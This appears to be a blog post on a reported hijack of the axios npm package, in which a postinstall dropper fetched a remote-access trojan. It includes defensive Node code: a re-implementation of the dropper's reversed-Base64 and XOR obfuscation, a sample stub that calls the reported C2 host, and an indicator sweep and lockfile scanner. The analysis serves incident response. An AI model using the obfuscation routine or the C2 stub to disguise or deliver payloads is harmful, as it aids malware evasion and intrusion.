Your CI/CD pipeline hums along at 2 a.m. npm install axios. Boom—RAT burrows in. Cross-platform. Stealthy. Gone in 60 seconds.
And just like that, the JavaScript world's favorite HTTP client turns traitor. Axios, over 100 million weekly downloads, got hijacked on March 31, 2026. Two bogus versions, 1.14.1 and 0.30.4, live for two hours. Enough time to wreak havoc if you resolved a fresh axios in that window.
Who Let the RATs Out?
Maintainer account pwned. @jasonsaayman, they say: high perms, slow fix. No source code touched. Sneaky dependency: plain-crypto-js ([email protected]). Prepped 18 hours early, like a pro heist.
postinstall hook fires. node setup.js. Double-obfuscated dropper—reversed Base64, XOR with OrDeR_7077 key. Calls home to sfrclak[.]com:8000. Grabs platform-specific payload. Then? Poof. Self-erasing. Deletes itself, swaps package.json with a fake.
Clever bastards.
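The two obfuscation layers above are easy to reproduce. What follows is an added example, not the dropper's setup.js and not anything from the advisory: a small encoder and decoder in Node that applies XOR with the reported key OrDeR_7077, Base64, and a string reversal, plus a cheap triage heuristic for spotting reversed Base64. The order in which the real dropper stacks the layers is an assumption here, and the stage-one snippet it encodes is made up for the demo.

```javascript
// Added example, not the dropper's own code: a reference encoder and
// decoder for the layering the write-up describes, reversed Base64 over
// an XOR stream keyed with "OrDeR_7077". The key is the one reported;
// the exact order of the layers inside setup.js is an assumption here.

const KEY = "OrDeR_7077";

// Repeating-key XOR over raw bytes (same routine both directions).
function xorBytes(buf, key) {
  const k = Buffer.from(key, "utf8");
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) out[i] = buf[i] ^ k[i % k.length];
  return out;
}

// Attacker side: XOR, Base64-encode, then reverse the text.
function obfuscate(plaintext, key = KEY) {
  const xored = xorBytes(Buffer.from(plaintext, "utf8"), key);
  return xored.toString("base64").split("").reverse().join("");
}

// Analyst side: undo the reversal, Base64-decode, XOR with the same key.
function deobfuscate(blob, key = KEY) {
  const b64 = blob.split("").reverse().join("");
  return xorBytes(Buffer.from(b64, "base64"), key).toString("utf8");
}

// Cheap triage heuristic: reversed Base64 carries its "=" padding at the
// front instead of the end. Only fires when the length needed padding.
function looksReversedBase64(s) {
  return /^={1,2}[A-Za-z0-9+\/]+$/.test(s);
}

// Constructed stage-one stub for the demo. The host and port are the ones
// in the advisory; the line of code itself is made up for this example.
const SAMPLE_STAGE =
  'const C2 = "http://sfrclak.com:8000"; fetch(C2 + "/" + process.platform);';
const SAMPLE_BLOB = obfuscate(SAMPLE_STAGE);

function demo() {
  const recovered = deobfuscate(SAMPLE_BLOB);
  return { blob: SAMPLE_BLOB, recovered, ok: recovered === SAMPLE_STAGE };
}

console.log(demo());
```

Run it with node; it prints the blob and the recovered text. If you have a captured setup.js, feed its blob to deobfuscate; if the result is garbage, swap the layer order, since only the key and the two transforms are documented.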
The attacker did not modify any Axios source files directly. Instead, they added a pre-staged malicious dependency, [email protected], to the package.json of the new axios releases.
That’s the money quote from the Snyk advisory. Straight fire—shows how supply chain attacks evolve. Not typosquatting anymore. Real access, real pain.
MacOS, Windows, Linux: No One Spared
Apple fans? AppleScript fakes a daemon in /Library/Caches/com.apple.act.mond. Fingerprints your Mac—hostname, user, processes. Beacons every 60 seconds with a bogus IE8 UA. Commands? peinject for unsigned binaries (codesign hack), runscript for shell/osascript, rundir for app snooping, kill to bail.
Windows? VBS drops PowerShell RAT as wt.exe in PROGRAMDATA. Execution policy? Bypassed.
Linux gets Python in /tmp/ld.py, nohup’d into oblivion.
Universal compromise. Your dev box, CI runner—pick your poison.
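As an added example, not the page's own tooling or anything from the advisory, here is a triage sweep built from the indicators listed above: the three drop paths and the sfrclak[.]com C2. The log line format, the function names and the 60-second cadence heuristic are this example's own; the sample log lines are constructed, and the IE8 user-agent string is a stand-in because the page gives no exact value.

```javascript
// Added example, not from the page or the advisory: a triage sweep built
// from the host and network indicators the write-up lists. The function
// names, the log line format and the beacon-cadence heuristic are this
// example's own; the paths, host and port are the reported ones.

const HOST_IOCS = {
  darwin: () => ["/Library/Caches/com.apple.act.mond"],
  linux: () => ["/tmp/ld.py"],
  win32: (env) => [`${env.PROGRAMDATA || "C:\\ProgramData"}\\wt.exe`],
};
const C2_HOST = "sfrclak.com";
const C2_PORT = 8000;

// `exists` is injected so the sweep can run against fake data; on a real
// host pass require("fs").existsSync with process.platform / process.env.
function sweepHost(platform, env, exists) {
  const make = HOST_IOCS[platform];
  return make ? make(env).filter((p) => exists(p)) : [];
}

// Constructed egress-log format for this example:
// "<ISO timestamp> <client ip> <dest host>:<dest port> <user agent>"
function parseLine(line) {
  const m = line.match(/^(\S+) (\S+) ([^\s:]+):(\d+) (.*)$/);
  if (!m) return null;
  return { ts: Date.parse(m[1]), client: m[2], host: m[3], port: Number(m[4]), ua: m[5] };
}

// Any contact with the C2 domain is a hit. For clients that used port
// 8000, check whether the cadence matches the 60-second beacon described
// for the macOS implant.
function scanEgress(lines, tolSec = 5) {
  const byClient = new Map();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r || r.host !== C2_HOST) continue;
    if (!byClient.has(r.client)) byClient.set(r.client, { stamps: [], ports: new Set() });
    const c = byClient.get(r.client);
    c.stamps.push(r.ts);
    c.ports.add(r.port);
  }
  const report = [];
  for (const [client, { stamps, ports }] of byClient) {
    stamps.sort((a, b) => a - b);
    const gaps = stamps.slice(1).map((t, i) => (t - stamps[i]) / 1000).sort((a, b) => a - b);
    const median = gaps.length ? gaps[Math.floor(gaps.length / 2)] : null;
    report.push({
      client,
      count: stamps.length,
      ports: [...ports].sort((a, b) => a - b),
      medianGapSec: median,
      beaconLike: ports.has(C2_PORT) && median !== null && Math.abs(median - 60) <= tolSec,
    });
  }
  return report;
}

// Constructed sample lines. The MSIE 8.0 user agent is a stand-in; the
// write-up only says the beacon uses a bogus IE8 UA, not the exact string.
const SAMPLE_LOG = [
  "2026-03-31T02:10:00Z 10.0.0.7 sfrclak.com:8000 Mozilla/4.0 (compatible; MSIE 8.0)",
  "2026-03-31T02:11:00Z 10.0.0.7 sfrclak.com:8000 Mozilla/4.0 (compatible; MSIE 8.0)",
  "2026-03-31T02:12:01Z 10.0.0.7 sfrclak.com:8000 Mozilla/4.0 (compatible; MSIE 8.0)",
  "2026-03-31T02:12:30Z 10.0.0.9 registry.npmjs.org:443 npm/10.8.2 node/v22.0.0",
  "2026-03-31T02:13:00Z 10.0.0.9 sfrclak.com:443 Mozilla/5.0 (X11; Linux x86_64)",
];

console.log(scanEgress(SAMPLE_LOG));
```

A missing artifact is weak evidence: the dropper erases itself and the implant can be removed. Egress records showing your CI runners or dev boxes contacting sfrclak[.]com, especially at a steady one-minute cadence on port 8000, are the stronger signal, and they tell you which hosts need their secrets rotated.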
Secondary hits too: @qqbrowser/openclaw-qbot and @shadanai/openclaw. Same dirty dep. Coordinated? Or just opportunistic? Smells like a kit.
Did npm Just Admit Defeat?
Here’s my hot take—the one nobody’s saying. This echoes SolarWinds 2020, but npm’s worse: zero vetting on maintainers. GitHub perms? Nice try. One compromised key, and it’s game over for millions. Prediction: npm won’t mandate 2FA till the next big one. They’ll tweet “lessons learned,” devs keep pinning versions like it’s 2015. Wake up, npm. You’re a registry, not a trust fund.
Immediate fix? Audit lockfiles. Rotate secrets. Snyk’s got advisories—SNYK-JS-AXIOS-15850774 et al. Safe? Anything but those two versions.
But let’s be real. How many unchecked pipelines out there? Enterprises patting themselves on the back for Dependabot, while indie devs npm i away.
Dry humor time: Axios makes HTTP calls safe. Till it makes RAT calls instead.
Why Does This Matter for Every JS Dev?
You’re not paranoid if they really are out to get you. 100M downloads weekly? That’s every Node project, React app, Electron desktop. Your Vercel deploy? GitHub Actions? If they pulled fresh during 01:29-03:29 UTC, congrats—you might’ve invited squatters.
npm yanked ‘em fast. But damage? Unknown. C2 server lit up? Victims beaconing? Attackers got persistence, command exec, binary drops. Nation-state? Ransomware crew? Who knows—sfrclak[.]com ain’t talking.
And the PR spin? Axios GitHub thread’s a circus. Collaborators scrambling, perms yanked. Too late, fellas.
Worse: Bun, Yarn, any manager that resolved a fresh axios in that window got the same poisoned dependency; whether the postinstall actually fired depends on its policy for running dependency install scripts. Package managers united in fragility.
Look, I’ve railed against npm bloat before. Time to pin, audit, maybe—gasp—self-host binaries. Or watch the next maintainer sip piña coladas in Belarus.
The Bigger Picture: Supply Chain’s Fragile Underbelly
Supply chain attacks aren't new. XZ Utils in 2024 nearly backdoored SSH. But JS? Playground for script kiddies turned pros. plain-crypto-js was staged clean, then poisoned. That's opsec.
Unique angle: This RAT’s modularity screams reuse. peinject on Mac? That’s APT-level. Expect copycats on React, Lodash next. npm’s scale is the feature, not the bug.
Devs, run npm ls plain-crypto-js. Nothing? Good, or just well-erased: the dropper rewrites package.json, so check package-lock.json and your CI install logs too. Tools like Socket, Sigstore: use 'em. Or don't, and enjoy the show.
Skeptical? Yeah. Axios team’ll patch perms, but humans click phishing. Always will.
Frequently Asked Questions
What happened to the axios npm package?
Two versions (1.14.1 and 0.30.4) were published from the hijacked maintainer account. Both pulled in the RAT through the plain-crypto-js dependency. Live about two hours, pulled by 03:29 UTC on March 31, 2026.
Is my machine safe if I installed axios recently?
Check package-lock.json (or yarn.lock) for those two versions or for the plain-crypto-js dependency ([email protected]). The dropper deletes itself and rewrites package.json, so a clean tree proves little. Rotate any secrets that were on the box, look for the platform artifacts above (/Library/Caches/com.apple.act.mond, wt.exe under PROGRAMDATA, /tmp/ld.py), and scan egress logs for sfrclak[.]com:8000.
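The lockfile audit this answer (and the body above) calls for, as an added example that is not part of the page or of npm's own tooling: a scanner that reads a package-lock.json, handles both the old nested format and the flat packages map, and reports the two pulled axios versions plus any plain-crypto-js entry regardless of version. The sample lockfile is constructed, and its plain-crypto-js version is a placeholder because the page does not give the real one.

```javascript
// Added example, not part of the page or of npm's own tooling: scan a
// package-lock.json for the two pulled axios releases and for any
// plain-crypto-js entry, whatever its version. Handles lockfileVersion 1
// (nested "dependencies" tree) and 2/3 (flat "packages" map). The sample
// lockfile below is constructed; the placeholder plain-crypto-js version
// is not the real one, which the write-up does not state.

const BAD_AXIOS = new Set(["1.14.1", "0.30.4"]);
const STAGED_DEP = "plain-crypto-js";

function check(name, version, where, findings) {
  if (name === "axios" && BAD_AXIOS.has(version)) {
    findings.push({ name, version, where, why: "pulled axios release" });
  }
  if (name === STAGED_DEP) {
    findings.push({ name, version, where, why: "staged malicious dependency" });
  }
}

function scanLock(lock) {
  const findings = [];
  if (lock.packages) {
    // v2/v3 keys look like "node_modules/axios" or
    // "node_modules/foo/node_modules/@scope/pkg"; "" is the root project.
    const marker = "node_modules/";
    for (const [key, entry] of Object.entries(lock.packages)) {
      const at = key.lastIndexOf(marker);
      if (at < 0) continue; // root project or workspace link, not a registry package
      check(key.slice(at + marker.length), entry.version, key, findings);
    }
  } else {
    // v1: walk the nested dependency objects, recording the path
    const walk = (deps, trail) => {
      for (const [name, entry] of Object.entries(deps || {})) {
        const where = trail ? `${trail} > ${name}` : name;
        check(name, entry.version, where, findings);
        walk(entry.dependencies, where);
      }
    };
    walk(lock.dependencies, "");
  }
  return findings;
}

// Constructed lockfile shaped like a real v3 file for a project that
// resolved fresh during the window.
const SAMPLE_LOCK = {
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", dependencies: { axios: "^1" } },
    "node_modules/axios": {
      version: "1.14.1",
      resolved: "https://registry.npmjs.org/axios/-/axios-1.14.1.tgz",
      dependencies: { "plain-crypto-js": "*" },
    },
    "node_modules/plain-crypto-js": { version: "x.y.z" }, // placeholder version
    "node_modules/lodash": { version: "4.17.21" },
  },
};

console.log(scanLock(SAMPLE_LOCK));

// Against a real file: node scan-lock.js path/to/package-lock.json
if (typeof require !== "undefined" && typeof process !== "undefined" && process.argv[2]) {
  const fs = require("fs");
  console.log(scanLock(JSON.parse(fs.readFileSync(process.argv[2], "utf8"))));
}
```

A clean npm ls proves little once the dropper has rewritten package.json; the committed lockfile and the CI install log are the record. Install from the lockfile with npm ci, and consider ignore-scripts=true in CI so a postinstall hook cannot run at all, accepting that packages which genuinely need a build step will then have to be handled explicitly.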
How to prevent npm supply chain attacks?
Pin exact versions and install from a committed lockfile (npm ci), enable 2FA on every maintainer account, and audit deps with Snyk or Socket. Where CI can live without install scripts, set ignore-scripts, since a postinstall hook is what ran here. npm audit fix helps, but verify what it changes.